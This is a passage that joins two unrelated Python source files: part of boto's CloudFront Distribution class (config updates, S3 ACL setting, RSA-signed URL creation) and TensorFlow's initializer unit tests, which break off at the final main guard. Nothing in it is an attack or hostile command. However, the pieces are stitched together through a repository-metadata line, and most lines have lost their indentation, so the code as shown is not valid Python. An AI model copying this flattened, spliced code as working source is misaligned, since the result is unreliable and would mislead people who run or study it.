Distribution. Maximum of 10 values.
:type comment: str or unicode
:param comment: The comment associated with the Distribution.
"""
new_config = DistributionConfig(self.connection, self.config.origin,
self.config.enabled, self.config.caller_reference,
self.config.cnames, self.config.comment,
self.config.trusted_signers,
self.config.default_root_object)
if enabled is not None:
new_config.enabled = enabled
if cnames is not None:
new_config.cnames = cnames
if comment is not None:
new_config.comment = comment
self.etag = self.connection.set_distribution_config(self.id, self.etag, new_config)
self.config = new_config
self._object_class = Object
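    # A minimal usage sketch; conn and distribution_id are assumed
    # placeholders for an existing CloudFrontConnection and id:
    #
    #     dist = conn.get_distribution_info(distribution_id)
    #     dist.update(enabled=False, comment='maintenance window')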
def enable(self):
"""
Activate the Distribution. A convenience wrapper around
the update method.
"""
self.update(enabled=True)
def disable(self):
"""
Deactivate the Distribution. A convenience wrapper around
the update method.
"""
self.update(enabled=False)
def delete(self):
"""
Delete this CloudFront Distribution. The content
associated with the Distribution is not deleted from
the underlying Origin bucket in S3.
"""
self.connection.delete_distribution(self.id, self.etag)
def _get_bucket(self):
if isinstance(self.config.origin, S3Origin):
if not self._bucket:
bucket_dns_name = self.config.origin.dns_name
bucket_name = bucket_dns_name.replace('.s3.amazonaws.com', '')
from boto.s3.connection import S3Connection
s3 = S3Connection(self.connection.aws_access_key_id,
self.connection.aws_secret_access_key,
proxy=self.connection.proxy,
proxy_port=self.connection.proxy_port,
proxy_user=self.connection.proxy_user,
proxy_pass=self.connection.proxy_pass)
self._bucket = s3.get_bucket(bucket_name)
self._bucket.distribution = self
self._bucket.set_key_class(self._object_class)
return self._bucket
else:
raise NotImplementedError('Unable to get_objects on CustomOrigin')
def get_objects(self):
"""
Return a list of all content objects in this distribution.
:rtype: list of :class:`boto.cloudfront.object.Object`
:return: The content objects
"""
bucket = self._get_bucket()
objs = []
for key in bucket:
objs.append(key)
return objs
def set_permissions(self, object, replace=False):
"""
Sets the S3 ACL grants for the given object to the appropriate
value based on the type of Distribution. If the Distribution
is serving private content the ACL will be set to include the
Origin Access Identity associated with the Distribution. If
the Distribution is serving public content the content will
be set up with "public-read".
:type object: :class:`boto.cloudfront.object.Object`
        :param object: The Object whose ACL is being set
:type replace: bool
:param replace: If False, the Origin Access Identity will be
appended to the existing ACL for the object.
If True, the ACL for the object will be
completely replaced with one that grants
READ permission to the Origin Access Identity.
"""
if isinstance(self.config.origin, S3Origin):
if self.config.origin.origin_access_identity:
id = self.config.origin.origin_access_identity.split('/')[-1]
oai = self.connection.get_origin_access_identity_info(id)
policy = object.get_acl()
if replace:
policy.acl = ACL()
policy.acl.add_user_grant('READ', oai.s3_user_id)
object.set_acl(policy)
else:
object.set_canned_acl('public-read')
def set_permissions_all(self, replace=False):
"""
Sets the S3 ACL grants for all objects in the Distribution
to the appropriate value based on the type of Distribution.
:type replace: bool
:param replace: If False, the Origin Access Identity will be
appended to the existing ACL for the object.
If True, the ACL for the object will be
completely replaced with one that grants
READ permission to the Origin Access Identity.
"""
bucket = self._get_bucket()
for key in bucket:
self.set_permissions(key, replace)
def add_object(self, name, content, headers=None, replace=True):
"""
Adds a new content object to the Distribution. The content
for the object will be copied to a new Key in the S3 Bucket
and the permissions will be set appropriately for the type
of Distribution.
:type name: str or unicode
:param name: The name or key of the new object.
:type content: file-like object
:param content: A file-like object that contains the content
for the new object.
:type headers: dict
:param headers: A dictionary containing additional headers
you would like associated with the new
object in S3.
:rtype: :class:`boto.cloudfront.object.Object`
:return: The newly created object.
"""
if self.config.origin.origin_access_identity:
policy = 'private'
else:
policy = 'public-read'
bucket = self._get_bucket()
object = bucket.new_key(name)
object.set_contents_from_file(content, headers=headers, policy=policy)
if self.config.origin.origin_access_identity:
self.set_permissions(object, replace)
return object
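    # e.g. (sketch; ``content`` must be a readable file-like object):
    #
    #     with open('logo.png', 'rb') as fp:
    #         obj = dist.add_object('images/logo.png', fp)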
def create_signed_url(self, url, keypair_id,
expire_time=None, valid_after_time=None,
ip_address=None, policy_url=None,
private_key_file=None, private_key_string=None):
"""
Creates a signed CloudFront URL that is only valid within the specified
parameters.
:type url: str
:param url: The URL of the protected object.
:type keypair_id: str
        :param keypair_id: The keypair ID of the Amazon KeyPair used to sign
                           the URL. This ID MUST correspond to the private key
                           specified with private_key_file or private_key_string.
        :type expire_time: int
        :param expire_time: The expiry time of the URL. If provided, the URL
            will expire after the time has passed. If not provided, the URL
            will never expire. Format is a unix epoch.
Use time.time() + duration_in_sec.
:type valid_after_time: int
:param valid_after_time: If provided, the URL will not be valid until
after valid_after_time. Format is a unix epoch.
Use time.time() + secs_until_valid.
:type ip_address: str
:param ip_address: If provided, only allows access from the specified
IP address. Use '192.168.0.10' for a single IP or
use '192.168.0.0/24' CIDR notation for a subnet.
:type policy_url: str
:param policy_url: If provided, allows the signature to contain
wildcard globs in the URL. For example, you could
provide: 'http://example.com/media/\*' and the policy
and signature would allow access to all contents of
the media subdirectory. If not specified, only
allow access to the exact url provided in 'url'.
:type private_key_file: str or file object.
:param private_key_file: If provided, contains the filename of the
private key file used for signing or an open
file object containing the private key
contents. Only one of private_key_file or
private_key_string can be provided.
:type private_key_string: str
:param private_key_string: If provided, contains the private key string
used for signing. Only one of private_key_file or
private_key_string can be provided.
:rtype: str
:return: The signed URL.
"""
# Get the required parameters
params = self._create_signing_params(
url=url, keypair_id=keypair_id, expire_time=expire_time,
valid_after_time=valid_after_time, ip_address=ip_address,
policy_url=policy_url, private_key_file=private_key_file,
private_key_string=private_key_string)
#combine these into a full url
if "?" in url:
sep = "&"
else:
sep = "?"
signed_url_params = []
for key in ["Expires", "Policy", "Signature", "Key-Pair-Id"]:
if key in params:
param = "%s=%s" % (key, params[key])
signed_url_params.append(param)
signed_url = url + sep + "&".join(signed_url_params)
return signed_url
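    # A minimal signing sketch (hypothetical keypair id and key path; requires
    # the ``rsa`` package, see _sign_string below):
    #
    #     url = dist.create_signed_url(
    #         'http://%s/private/movie.mp4' % dist.domain_name,
    #         keypair_id='APKAEXAMPLEEXAMPLE',
    #         expire_time=int(time.time()) + 3600,
    #         private_key_file='/path/to/pk-APKAEXAMPLEEXAMPLE.pem')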
def _create_signing_params(self, url, keypair_id,
expire_time=None, valid_after_time=None,
ip_address=None, policy_url=None,
private_key_file=None, private_key_string=None):
"""
Creates the required URL parameters for a signed URL.
"""
params = {}
# Check if we can use a canned policy
if expire_time and not valid_after_time and not ip_address and not policy_url:
# we manually construct this policy string to ensure formatting
# matches signature
policy = self._canned_policy(url, expire_time)
params["Expires"] = str(expire_time)
else:
# If no policy_url is specified, default to the full url.
if policy_url is None:
policy_url = url
# Can't use canned policy
policy = self._custom_policy(policy_url, expires=expire_time,
valid_after=valid_after_time,
ip_address=ip_address)
encoded_policy = self._url_base64_encode(policy)
params["Policy"] = encoded_policy
#sign the policy
signature = self._sign_string(policy, private_key_file, private_key_string)
#now base64 encode the signature (URL safe as well)
encoded_signature = self._url_base64_encode(signature)
params["Signature"] = encoded_signature
params["Key-Pair-Id"] = keypair_id
return params
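    # The returned dict maps one-to-one onto the query-string keys assembled
    # in create_signed_url above, e.g. (values abbreviated, hypothetical):
    #
    #     {'Expires': '1258237200', 'Signature': 'a3X...', 'Key-Pair-Id': 'APKA...'}
    #
    # (a custom policy yields a 'Policy' key in place of 'Expires')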
@staticmethod
def _canned_policy(resource, expires):
"""
Creates a canned policy string.
"""
policy = ('{"Statement":[{"Resource":"%(resource)s",'
'"Condition":{"DateLessThan":{"AWS:EpochTime":'
'%(expires)s}}}]}' % locals())
return policy
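    # e.g. _canned_policy('http://d111.cloudfront.net/img.jpg', 1258237200)
    # returns exactly (no whitespace, so the signature matches CloudFront's
    # canonical form):
    #
    #     {"Statement":[{"Resource":"http://d111.cloudfront.net/img.jpg","Condition":{"DateLessThan":{"AWS:EpochTime":1258237200}}}]}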
@staticmethod
def _custom_policy(resource, expires=None, valid_after=None, ip_address=None):
"""
Creates a custom policy string based on the supplied parameters.
"""
condition = {}
# SEE: http://docs.amazonwebservices.com/AmazonCloudFront/latest/DeveloperGuide/RestrictingAccessPrivateContent.html#CustomPolicy
# The 'DateLessThan' property is required.
if not expires:
# Defaults to ONE day
expires = int(time.time()) + 86400
condition["DateLessThan"] = {"AWS:EpochTime": expires}
if valid_after:
condition["DateGreaterThan"] = {"AWS:EpochTime": valid_after}
if ip_address:
if '/' not in ip_address:
ip_address += "/32"
condition["IpAddress"] = {"AWS:SourceIp": ip_address}
policy = {"Statement": [{
"Resource": resource,
"Condition": condition}]}
return json.dumps(policy, separators=(",", ":"))
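    # e.g. _custom_policy('http://example.com/media/*', expires=1258237200,
    # ip_address='192.0.2.0/24') produces compact JSON of the form (dict key
    # order may vary):
    #
    #     {"Statement":[{"Resource":"http://example.com/media/*","Condition":{"DateLessThan":{"AWS:EpochTime":1258237200},"IpAddress":{"AWS:SourceIp":"192.0.2.0/24"}}}]}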
@staticmethod
def _sign_string(message, private_key_file=None, private_key_string=None):
"""
Signs a string for use with Amazon CloudFront.
Requires the rsa library be installed.
"""
try:
import rsa
except ImportError:
raise NotImplementedError("Boto depends on the python rsa "
"library to generate signed URLs for "
"CloudFront")
# Make sure only one of private_key_file and private_key_string is set
if private_key_file and private_key_string:
raise ValueError("Only specify the private_key_file or the private_key_string not both")
if not private_key_file and not private_key_string:
raise ValueError("You must specify one of private_key_file or private_key_string")
# If private_key_file is a file name, open it and read it
if private_key_string is None:
if isinstance(private_key_file, basestring):
with open(private_key_file, 'r') as file_handle:
private_key_string = file_handle.read()
# Otherwise, treat it like a file
else:
private_key_string = private_key_file.read()
# Sign it!
private_key = rsa.PrivateKey.load_pkcs1(private_key_string)
signature = rsa.sign(str(message), private_key, 'SHA-1')
return signature
@staticmethod
def _url_base64_encode(msg):
"""
Base64 encodes a string using the URL-safe characters specified by
Amazon.
"""
msg_base64 = base64.b64encode(msg)
msg_base64 = msg_base64.replace('+', '-')
msg_base64 = msg_base64.replace('=', '_')
msg_base64 = msg_base64.replace('/', '~')
return msg_base64
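# Encoding sketch: base64.b64encode('ab?') gives 'YWI/', and the replacements
# above make it query-string safe per the CloudFront convention:
#
#     Distribution._url_base64_encode('ab?')   # -> 'YWI~'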
class StreamingDistribution(Distribution):
def __init__(self, connection=None, config=None, domain_name='',
id='', last_modified_time=None, status=''):
super(StreamingDistribution, self).__init__(connection, config,
domain_name, id, last_modified_time, status)
self._object_class = StreamingObject
def startElement(self, name, attrs, connection):
if name == 'StreamingDistributionConfig':
self.config = StreamingDistributionConfig()
return self.config
else:
return super(StreamingDistribution, self).startElement(name, attrs,
connection)
def update(self, enabled=None, cnames=None, comment=None):
"""
Update the configuration of the StreamingDistribution. The only values
of the StreamingDistributionConfig that can be directly updated are:
* CNAMES
* Comment
* Whether the Distribution is enabled or not
Any changes to the ``trusted_signers`` or ``origin`` properties of
this distribution's current config object will also be included in
the update. Therefore, to set the origin access identity for this
distribution, set
``StreamingDistribution.config.origin.origin_access_identity``
before calling this update method.
:type enabled: bool
:param enabled: Whether the StreamingDistribution is active or not.
:type cnames: list of str
        :param cnames: The DNS CNAMEs associated with this
                       Distribution. Maximum of 10 values.
:type comment: str or unicode
:param comment: The comment associated with the Distribution.
"""
new_config = StreamingDistributionConfig(self.connection,
self.config.origin,
self.config.enabled,
self.config.caller_reference,
self.config.cnames,
self.config.comment,
self.config.trusted_signers)
if enabled is not None:
new_config.enabled = enabled
if cnames is not None:
new_config.cnames = cnames
if comment is not None:
new_config.comment = comment
self.etag = self.connection.set_streaming_distribution_config(self.id,
self.etag,
new_config)
self.config = new_config
self._object_class = StreamingObject
def delete(self):
self.connection.delete_streaming_distribution(self.id, self.etag)
|
JVillella/tensorflow | refs/heads/master | tensorflow/python/kernel_tests/init_ops_test.py | 67 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
# Returns true iff the two initializers produce the same tensor to
# within a tiny tolerance.
def identicaltest(tc, init1, init2, shape=None):
"""Tests if two initializations are identical to within tiny tolerances.
Args:
tc: An instance of TensorFlowTestCase.
init1: An Initializer that generates a tensor of a given shape
init2: An Initializer that generates a tensor of a given shape
shape: Shape of the tensor to initialize or `None` to use a vector of length
100.
Returns:
True or False as determined by test.
"""
if shape is None:
shape = [100]
with tc.test_session(graph=ops.Graph()):
t1 = init1(shape).eval()
with tc.test_session(graph=ops.Graph()):
t2 = init2(shape).eval()
return np.allclose(t1, t2, rtol=1e-15, atol=1e-15)
def duplicated_initializer(tc, init, graph_seed, shape=None):
"""Tests duplicated random initializer within the same graph.
  This test generates two random kernels from the same initializer in the same
  graph, and checks if the results are close enough. Even given the same global
  seed, two different instances of random kernels should generate different
  results.
Args:
tc: An instance of TensorFlowTestCase.
init: An Initializer that generates a tensor of a given shape
graph_seed: A graph-level seed to use.
shape: Shape of the tensor to initialize or `None` to use a vector of length
100.
Returns:
True or False as determined by test.
"""
if shape is None:
shape = [100]
with tc.test_session(graph=ops.Graph()):
random_seed.set_random_seed(graph_seed)
t1 = init(shape).eval()
t2 = init(shape).eval()
return np.allclose(t1, t2, rtol=1e-15, atol=1e-15)
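# A minimal illustration of the behavior under test (hypothetical shape):
# under a fixed graph-level seed, two calls to the same initializer create
# two ops with distinct op-level seeds, so their draws differ:
#
#   random_seed.set_random_seed(42)
#   init = init_ops.random_normal_initializer()
#   a, b = init([4]), init([4])   # distinct ops -> different values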
def _init_sampler(tc, init, num):
"""Returns a func to generate a random tensor of shape [num].
Args:
tc: An instance of TensorFlowTestCase.
init: An Initializer that generates a tensor of a given shape
num: Size of 1D tensor to create.
Returns:
Function to generate a random tensor.
"""
def func():
with tc.test_session(use_gpu=True):
return init([num]).eval()
return func
class ConstantInitializersTest(test.TestCase):
def testZerosInitializer(self):
with self.test_session(use_gpu=True):
shape = [2, 3]
x = variable_scope.get_variable(
"x", shape=shape, initializer=init_ops.zeros_initializer())
x.initializer.run()
self.assertAllEqual(x.eval(), np.zeros(shape))
def testOnesInitializer(self):
with self.test_session(use_gpu=True):
shape = [2, 3]
x = variable_scope.get_variable(
"x", shape=shape, initializer=init_ops.ones_initializer())
x.initializer.run()
self.assertAllEqual(x.eval(), np.ones(shape))
def testConstantZeroInitializer(self):
with self.test_session(use_gpu=True):
shape = [2, 3]
x = variable_scope.get_variable(
"x", shape=shape, initializer=init_ops.constant_initializer(0.0))
x.initializer.run()
self.assertAllEqual(x.eval(), np.zeros(shape))
def testConstantOneInitializer(self):
with self.test_session(use_gpu=True):
shape = [2, 3]
x = variable_scope.get_variable(
"x", shape=shape, initializer=init_ops.constant_initializer(1.0))
x.initializer.run()
self.assertAllEqual(x.eval(), np.ones(shape))
def testConstantIntInitializer(self):
with self.test_session(use_gpu=True):
shape = [2, 3]
x = variable_scope.get_variable(
"x",
shape=shape,
dtype=dtypes.int32,
initializer=init_ops.constant_initializer(7))
x.initializer.run()
self.assertEqual(x.dtype.base_dtype, dtypes.int32)
self.assertAllEqual(x.eval(), 7 * np.ones(shape, dtype=np.int32))
def _testNDimConstantInitializer(self, name, value, shape, expected):
with self.test_session(use_gpu=True):
init = init_ops.constant_initializer(value, dtype=dtypes.int32)
x = variable_scope.get_variable(name, shape=shape, initializer=init)
x.initializer.run()
actual = array_ops.reshape(x, [-1]).eval()
self.assertEqual(len(actual), len(expected))
for a, e in zip(actual, expected):
self.assertEqual(a, e)
def testNDimConstantInitializer(self):
value = [0, 1, 2, 3, 4, 5]
shape = [2, 3]
expected = list(value)
self._testNDimConstantInitializer("list", value, shape, expected)
self._testNDimConstantInitializer("ndarray",
np.asarray(value), shape, expected)
self._testNDimConstantInitializer("2D-ndarray",
np.asarray(value).reshape(tuple(shape)),
shape, expected)
def _testNDimConstantInitializerLessValues(self, name, value, shape,
expected):
with self.test_session(use_gpu=True):
init = init_ops.constant_initializer(value, dtype=dtypes.int32)
x = variable_scope.get_variable(name, shape=shape, initializer=init)
x.initializer.run()
actual = array_ops.reshape(x, [-1]).eval()
self.assertGreater(len(actual), len(expected))
for i in xrange(len(actual)):
a = actual[i]
e = expected[i] if i < len(expected) else expected[-1]
self.assertEqual(a, e)
def testNDimConstantInitializerLessValues(self):
value = [0, 1, 2, 3, 4, 5]
shape = [2, 4]
expected = list(value)
self._testNDimConstantInitializerLessValues("list", value, shape, expected)
self._testNDimConstantInitializerLessValues("ndarray",
np.asarray(value), shape,
expected)
self._testNDimConstantInitializerLessValues(
"2D-ndarray", np.asarray(value).reshape(tuple([2, 3])), shape, expected)
def _testNDimConstantInitializerMoreValues(self, value, shape):
ops.reset_default_graph()
with self.test_session(use_gpu=True):
init = init_ops.constant_initializer(value, dtype=dtypes.int32)
self.assertRaises(
ValueError,
variable_scope.get_variable,
"x",
shape=shape,
initializer=init)
def testNDimConstantInitializerMoreValues(self):
value = [0, 1, 2, 3, 4, 5, 6, 7]
shape = [2, 3]
self._testNDimConstantInitializerMoreValues(value, shape)
self._testNDimConstantInitializerMoreValues(np.asarray(value), shape)
self._testNDimConstantInitializerMoreValues(
np.asarray(value).reshape(tuple([2, 4])), shape)
class RandomNormalInitializationTest(test.TestCase):
def testInitializerIdentical(self):
for dtype in [dtypes.float32, dtypes.float64]:
init1 = init_ops.random_normal_initializer(0.0, 1.0, seed=1, dtype=dtype)
init2 = init_ops.random_normal_initializer(0.0, 1.0, seed=1, dtype=dtype)
self.assertTrue(identicaltest(self, init1, init2))
def testInitializerDifferent(self):
for dtype in [dtypes.float32, dtypes.float64]:
init1 = init_ops.random_normal_initializer(0.0, 1.0, seed=1, dtype=dtype)
init2 = init_ops.random_normal_initializer(0.0, 1.0, seed=2, dtype=dtype)
self.assertFalse(identicaltest(self, init1, init2))
def testDuplicatedInitializer(self):
init = init_ops.random_normal_initializer(0.0, 1.0)
self.assertFalse(duplicated_initializer(self, init, 1))
def testInvalidDataType(self):
self.assertRaises(
ValueError,
init_ops.random_normal_initializer,
0.0,
1.0,
dtype=dtypes.string)
class TruncatedNormalInitializationTest(test.TestCase):
def testInitializerIdentical(self):
for dtype in [dtypes.float32, dtypes.float64]:
init1 = init_ops.truncated_normal_initializer(
0.0, 1.0, seed=1, dtype=dtype)
init2 = init_ops.truncated_normal_initializer(
0.0, 1.0, seed=1, dtype=dtype)
self.assertTrue(identicaltest(self, init1, init2))
def testInitializerDifferent(self):
for dtype in [dtypes.float32, dtypes.float64]:
init1 = init_ops.truncated_normal_initializer(
0.0, 1.0, seed=1, dtype=dtype)
init2 = init_ops.truncated_normal_initializer(
0.0, 1.0, seed=2, dtype=dtype)
self.assertFalse(identicaltest(self, init1, init2))
def testDuplicatedInitializer(self):
init = init_ops.truncated_normal_initializer(0.0, 1.0)
self.assertFalse(duplicated_initializer(self, init, 1))
def testInvalidDataType(self):
self.assertRaises(
ValueError,
init_ops.truncated_normal_initializer,
0.0,
1.0,
dtype=dtypes.string)
class RandomUniformInitializationTest(test.TestCase):
def testInitializerIdentical(self):
for dtype in [dtypes.float32, dtypes.float64, dtypes.int64]:
init1 = init_ops.random_uniform_initializer(0, 7, seed=1, dtype=dtype)
init2 = init_ops.random_uniform_initializer(0, 7, seed=1, dtype=dtype)
self.assertTrue(identicaltest(self, init1, init2))
def testInitializerDifferent(self):
for dtype in [dtypes.float32, dtypes.float64, dtypes.int32, dtypes.int64]:
init1 = init_ops.random_uniform_initializer(0, 7, seed=1, dtype=dtype)
init2 = init_ops.random_uniform_initializer(0, 7, seed=2, dtype=dtype)
self.assertFalse(identicaltest(self, init1, init2))
def testDuplicatedInitializer(self):
init = init_ops.random_uniform_initializer(0.0, 1.0)
self.assertFalse(duplicated_initializer(self, init, 1))
class UniformUnitScalingInitializationTest(test.TestCase):
def testInitializerIdentical(self):
for dtype in [dtypes.float32, dtypes.float64]:
init1 = init_ops.uniform_unit_scaling_initializer(seed=1, dtype=dtype)
init2 = init_ops.uniform_unit_scaling_initializer(seed=1, dtype=dtype)
self.assertTrue(identicaltest(self, init1, init2))
init3 = init_ops.uniform_unit_scaling_initializer(
1.5, seed=1, dtype=dtype)
init4 = init_ops.uniform_unit_scaling_initializer(
1.5, seed=1, dtype=dtype)
self.assertTrue(identicaltest(self, init3, init4))
def testInitializerDifferent(self):
for dtype in [dtypes.float32, dtypes.float64]:
init1 = init_ops.uniform_unit_scaling_initializer(seed=1, dtype=dtype)
init2 = init_ops.uniform_unit_scaling_initializer(seed=2, dtype=dtype)
init3 = init_ops.uniform_unit_scaling_initializer(
1.5, seed=1, dtype=dtype)
self.assertFalse(identicaltest(self, init1, init2))
self.assertFalse(identicaltest(self, init1, init3))
self.assertFalse(identicaltest(self, init2, init3))
def testZeroSize(self):
shape = [0, 2]
with self.test_session():
x = variable_scope.get_variable(
"x",
shape=shape,
initializer=init_ops.uniform_unit_scaling_initializer())
variables.global_variables_initializer().run()
self.assertAllEqual(shape, x.eval().shape)
def testDuplicatedInitializer(self):
init = init_ops.uniform_unit_scaling_initializer()
self.assertFalse(duplicated_initializer(self, init, 1))
def testInvalidDataType(self):
self.assertRaises(
ValueError,
init_ops.uniform_unit_scaling_initializer,
dtype=dtypes.string)
# TODO(vrv): move to sequence_ops_test?
class RangeTest(test.TestCase):
def _Range(self, start, limit, delta):
with self.test_session(use_gpu=True):
tf_ans = math_ops.range(start, limit, delta, name="range")
self.assertEqual([len(np.arange(start, limit, delta))],
tf_ans.get_shape())
return tf_ans.eval()
def testBasic(self):
self.assertTrue(
np.array_equal(self._Range(0, 5, 1), np.array([0, 1, 2, 3, 4])))
self.assertTrue(np.array_equal(self._Range(0, 5, 2), np.array([0, 2, 4])))
self.assertTrue(np.array_equal(self._Range(0, 6, 2), np.array([0, 2, 4])))
self.assertTrue(
np.array_equal(self._Range(13, 32, 7), np.array([13, 20, 27])))
self.assertTrue(
np.array_equal(
self._Range(100, 500, 100), np.array([100, 200, 300, 400])))
self.assertEqual(math_ops.range(0, 5, 1).dtype, dtypes.int32)
def testLimitOnly(self):
with self.test_session(use_gpu=True):
self.assertAllEqual(np.arange(5), math_ops.range(5).eval())
def testEmpty(self):
for start in 0, 5:
self.assertTrue(np.array_equal(self._Range(start, start, 1), []))
def testNonInteger(self):
self.assertTrue(
np.allclose(self._Range(0, 2, 0.5), np.array([0, 0.5, 1, 1.5])))
self.assertTrue(np.allclose(self._Range(0, 5, 2.5), np.array([0, 2.5])))
self.assertTrue(
np.allclose(self._Range(0, 3, 0.9), np.array([0, 0.9, 1.8, 2.7])))
self.assertTrue(
np.allclose(
self._Range(100., 500., 100.), np.array([100, 200, 300, 400])))
self.assertEqual(math_ops.range(0., 5., 1.).dtype, dtypes.float32)
def testNegativeDelta(self):
self.assertTrue(
np.array_equal(self._Range(5, -1, -1), np.array([5, 4, 3, 2, 1, 0])))
self.assertTrue(
np.allclose(self._Range(2.5, 0, -0.5), np.array([2.5, 2, 1.5, 1, 0.5])))
self.assertTrue(
np.array_equal(self._Range(-5, -10, -3), np.array([-5, -8])))
def testDType(self):
zero_int32 = math_ops.cast(0, dtypes.int32)
zero_int64 = math_ops.cast(0, dtypes.int64)
zero_float32 = math_ops.cast(0, dtypes.float32)
zero_float64 = math_ops.cast(0, dtypes.float64)
self.assertEqual(math_ops.range(zero_int32, 0, 1).dtype, dtypes.int32)
self.assertEqual(math_ops.range(zero_int64, 0, 1).dtype, dtypes.int64)
self.assertEqual(math_ops.range(zero_float32, 0, 1).dtype, dtypes.float32)
self.assertEqual(math_ops.range(zero_float64, 0, 1).dtype, dtypes.float64)
self.assertEqual(
math_ops.range(zero_int32, zero_int64, 1).dtype, dtypes.int64)
self.assertEqual(
math_ops.range(zero_int64, zero_float32, 1).dtype, dtypes.float32)
self.assertEqual(
math_ops.range(zero_float32, zero_float64, 1).dtype, dtypes.float64)
self.assertEqual(
math_ops.range(zero_float64, zero_int32, 1).dtype, dtypes.float64)
self.assertEqual(
math_ops.range(
0, 0, 1, dtype=dtypes.int32).dtype, dtypes.int32)
self.assertEqual(
math_ops.range(
0, 0, 1, dtype=dtypes.int64).dtype, dtypes.int64)
self.assertEqual(
math_ops.range(
0, 0, 1, dtype=dtypes.float32).dtype, dtypes.float32)
self.assertEqual(
math_ops.range(
0, 0, 1, dtype=dtypes.float64).dtype, dtypes.float64)
# TODO(vrv): move to sequence_ops_test?
class LinSpaceTest(test.TestCase):
def _gpu_modes(self):
if test.is_gpu_available():
return [False, True]
else:
return [False]
def _LinSpace(self, start, stop, num):
# NOTE(touts): Needs to pass a graph to get a new session each time.
with ops.Graph().as_default() as graph:
with self.test_session(graph=graph, force_gpu=self.force_gpu):
tf_ans = math_ops.linspace(start, stop, num, name="linspace")
self.assertEqual([num], tf_ans.get_shape())
return tf_ans.eval()
def testPositive(self):
for self.force_gpu in self._gpu_modes():
self.assertArrayNear(self._LinSpace(1., 5., 1), np.array([1.]), 1e-5)
self.assertArrayNear(self._LinSpace(1., 5., 2), np.array([1., 5.]), 1e-5)
self.assertArrayNear(
self._LinSpace(1., 5., 3), np.array([1., 3., 5.]), 1e-5)
self.assertArrayNear(
self._LinSpace(1., 5., 4), np.array([1., 7. / 3., 11. / 3., 5.]),
1e-5)
def testNegative(self):
for self.force_gpu in self._gpu_modes():
self.assertArrayNear(self._LinSpace(-1., -5., 1), np.array([-1.]), 1e-5)
self.assertArrayNear(
self._LinSpace(-1., -5., 2), np.array([-1., -5.]), 1e-5)
self.assertArrayNear(
self._LinSpace(-1., -5., 3), np.array([-1., -3., -5.]), 1e-5)
self.assertArrayNear(
self._LinSpace(-1., -5., 4),
np.array([-1., -7. / 3., -11. / 3., -5.]), 1e-5)
def testNegativeToPositive(self):
for self.force_gpu in self._gpu_modes():
self.assertArrayNear(self._LinSpace(-1., 5., 1), np.array([-1.]), 1e-5)
self.assertArrayNear(
self._LinSpace(-1., 5., 2), np.array([-1., 5.]), 1e-5)
self.assertArrayNear(
self._LinSpace(-1., 5., 3), np.array([-1., 2., 5.]), 1e-5)
self.assertArrayNear(
self._LinSpace(-1., 5., 4), np.array([-1., 1., 3., 5.]), 1e-5)
def testPoint(self):
for self.force_gpu in self._gpu_modes():
self.assertArrayNear(self._LinSpace(5., 5., 1), np.array([5.]), 1e-5)
self.assertArrayNear(self._LinSpace(5., 5., 2), np.array([5.] * 2), 1e-5)
self.assertArrayNear(self._LinSpace(5., 5., 3), np.array([5.] * 3), 1e-5)
self.assertArrayNear(self._LinSpace(5., 5., 4), np.array([5.] * 4), 1e-5)
class DeviceTest(test.TestCase):
def testNoDevice(self):
with ops.Graph().as_default():
var = variables.Variable([[1.0, 1.0]])
self.assertDeviceEqual(None, var.device)
self.assertDeviceEqual(None, var.initializer.device)
def testDevice(self):
with ops.Graph().as_default():
with ops.device("/job:ps"):
var = variables.Variable([[1.0, 1.0]])
self.assertDeviceEqual("/job:ps", var.device)
self.assertDeviceEqual("/job:ps", var.initializer.device)
class OrthogonalInitializerTest(test.TestCase):
def testInitializerIdentical(self):
for dtype in [dtypes.float32, dtypes.float64]:
init1 = init_ops.orthogonal_initializer(seed=1, dtype=dtype)
init2 = init_ops.orthogonal_initializer(seed=1, dtype=dtype)
self.assertTrue(identicaltest(self, init1, init2, (10, 10)))
def testInitializerDifferent(self):
for dtype in [dtypes.float32, dtypes.float64]:
init1 = init_ops.orthogonal_initializer(seed=1, dtype=dtype)
init2 = init_ops.orthogonal_initializer(seed=2, dtype=dtype)
self.assertFalse(identicaltest(self, init1, init2, (10, 10)))
def testDuplicatedInitializer(self):
init = init_ops.orthogonal_initializer()
self.assertFalse(duplicated_initializer(self, init, 1, (10, 10)))
def testInvalidDataType(self):
self.assertRaises(
ValueError, init_ops.orthogonal_initializer, dtype=dtypes.string)
def testInvalidShape(self):
init1 = init_ops.orthogonal_initializer()
with self.test_session(graph=ops.Graph(), use_gpu=True):
self.assertRaises(ValueError, init1, shape=[5])
def testGain(self):
shape = (10, 10)
for dtype in [dtypes.float32, dtypes.float64]:
init1 = init_ops.orthogonal_initializer(seed=1, dtype=dtype)
init2 = init_ops.orthogonal_initializer(gain=3.14, seed=1, dtype=dtype)
with self.test_session(graph=ops.Graph(), use_gpu=True):
t1 = init1(shape).eval()
with self.test_session(graph=ops.Graph(), use_gpu=True):
t2 = init2(shape).eval()
      self.assertTrue(np.allclose(t1, t2 / 3.14, rtol=1e-15, atol=1e-15))
def testShapesValues(self):
for dtype in [dtypes.float32, dtypes.float64]:
for shape in [(10, 10), (10, 9, 8), (100, 5, 5), (50, 40), (40, 50)]:
init = init_ops.orthogonal_initializer(dtype=dtype)
tol = 1e-5 if dtype == dtypes.float32 else 1e-12
with self.test_session(graph=ops.Graph(), use_gpu=True):
# Check the shape
t = init(shape).eval()
self.assertAllEqual(shape, t.shape)
# Check orthogonality by computing the inner product
t = t.reshape((np.prod(t.shape[:-1]), t.shape[-1]))
if t.shape[0] > t.shape[1]:
self.assertAllClose(
np.dot(t.T, t), np.eye(t.shape[1]), rtol=tol, atol=tol)
else:
self.assertAllClose(
np.dot(t, t.T), np.eye(t.shape[0]), rtol=tol, atol=tol)
if __name__ == "__main__":
